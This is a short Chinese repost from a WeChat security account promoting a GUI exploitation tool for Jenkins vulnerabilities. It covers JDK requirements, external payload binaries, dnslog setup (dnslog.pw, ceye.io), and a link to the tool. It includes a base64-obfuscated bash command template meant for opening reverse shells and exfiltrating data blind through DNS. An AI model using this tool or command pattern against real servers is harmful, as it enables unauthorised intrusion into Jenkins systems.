一款Jenkins的综合漏洞利用工具
使用
jdk版本
在windows或linux使用jdk8的哪一个版本应该都可以,在macOS里需要jdk8u较高的版本,比如jdk8u321
外置payload
从release下载windows_tools,linux_tools或macOS_tools并放在与JenkinsExploit-GUI-*-SNAPSHOT.jar相同的目录,或者可以自行打包tools_source中的python源码文件
如果是linux或macOS的话需要对外置payload进行chmod +x 赋予权限
dnslog配置
进行dnslog设置,目前仅支持dnslog.pw和ceye.io
进行检测
- 在验证无回显命令执行的时候为了避免转义问题,推荐用如下方式进行反弹shell和dnslog外带信息
bash -c {echo,Y....}|{base64,-d}|{bash,-i}
获取工具
https://github.com/TheBeastofwar/JenkinsExploit-GUI
原文始发于微信公众号(白帽学子):Jenkins的综合漏洞利用工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论